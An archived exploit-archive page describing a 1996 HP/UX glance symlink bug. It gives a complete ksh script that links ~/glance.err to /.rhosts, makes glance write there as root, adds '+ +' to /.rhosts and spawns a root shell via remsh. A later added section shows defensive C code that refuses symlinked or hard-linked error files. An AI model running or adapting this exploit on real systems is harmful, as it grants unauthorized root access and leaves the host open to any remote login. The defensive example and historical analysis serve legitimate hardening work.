HP/UX SOD glance bug
Description: symlink bug due to poor error file creation
Author: Colonel Panic of SOD (sod@command.com.inter.net)
Compromise: root (local)
Vulnerable Systems: HP/UX with vulnerable /usr/perf/bin/glance, probably just 9.x
Date: October 1996
Notes: See the SOD HP Bug of the Week page
Exploit:
#!/bin/ksh
# exploit to work against the latest rev that I know of for glance+
# Tested on 9000/700.. Don't even know if it's available on 10.X
# You could've done this next week. .traz
if [ ! -x /usr/perf/bin/glance ]
then
    echo 'No diablo programme.'
    echo 'Que si como es que.'
    exit
fi
PATH=/usr/perf/bin:/bin:/usr/bin:$PATH
echo 'Please wait for about 10 seconds, or somewhere around that, anyway.'
sleep 3
cp /.rhosts /tmp/rhosts-save
ln -s /.rhosts ~/glance.err
glance -j 1 -f ';><:/?*&^${KILLME}' -iterations 1 -maxpages 1
echo '+ +' > /.rhosts
if [ -f /tmp/rhosts-save ]
then
    cat /tmp/rhosts-save >> /.rhosts
    rm /tmp/rhosts-save
fi
#rm ~/glance.err # This goes away? Why does this go away?
chmod 666 /.rhosts
chown root /.rhosts
remsh localhost -l root /bin/ksh -i
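
The defensive counterpart to the error-file bug above, as an added example (not code from glance, SOD, or the original page): a privileged program that opens a per-user error file should refuse symlinks and verify the object it actually opened. The page does not show glance's code; the assumption, drawn from the exploit's `ln -s /.rhosts ~/glance.err`, is that glance creates `~/glance.err` with root privilege and follows the link. `open_error_log`, `demo_links_refused` and the temp paths are hypothetical names, and the code assumes a POSIX.1-2008 system with `O_NOFOLLOW`.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (not glance's code): open a per-user error file for
 * append, or return -1 if the name is a symlink or an unexpected object.
 * A setuid program should also drop its effective uid to the real uid
 * before touching anything under the user's home directory. */
int open_error_log(const char *path, uid_t owner)
{
    struct stat st;
    /* O_NOFOLLOW: fail if the final path component is a symlink. */
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    /* Inspect the object actually opened (fstat on the fd, not the name):
     * regular file, owned by the user, no extra hard links. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != owner || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Self-check on constructed paths in a private temp dir. Returns 1 when the
 * planted symlink and hard link are refused and a fresh file is accepted. */
int demo_links_refused(void)
{
    char dir[] = "/tmp/errlog-XXXXXX", target[64], sym[64], hard[64], fresh[64];
    if (!mkdtemp(dir)) return 0;
    snprintf(target, sizeof target, "%s/rhosts", dir);   /* stands in for /.rhosts */
    snprintf(sym, sizeof sym, "%s/glance.err", dir);
    snprintf(hard, sizeof hard, "%s/hard.err", dir);
    snprintf(fresh, sizeof fresh, "%s/fresh.err", dir);
    int t = open(target, O_WRONLY | O_CREAT, 0600);
    if (t < 0 || symlink(target, sym) != 0 || link(target, hard) != 0) return 0;
    close(t);
    int via_sym = open_error_log(sym, geteuid());
    int via_hard = open_error_log(hard, geteuid());
    int ok = open_error_log(fresh, geteuid());
    if (ok >= 0) close(ok);
    unlink(sym); unlink(hard); unlink(fresh); unlink(target); rmdir(dir);
    return via_sym == -1 && via_hard == -1 && ok >= 0;
}

int main(void) { return demo_links_refused() ? 0 : 1; }
```

The ownership and link-count checks matter as much as `O_NOFOLLOW`: a hard link to a root-owned file is not a symlink, so only the `fstat` on the opened descriptor catches it.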
This page is part of Fyodor's exploit world.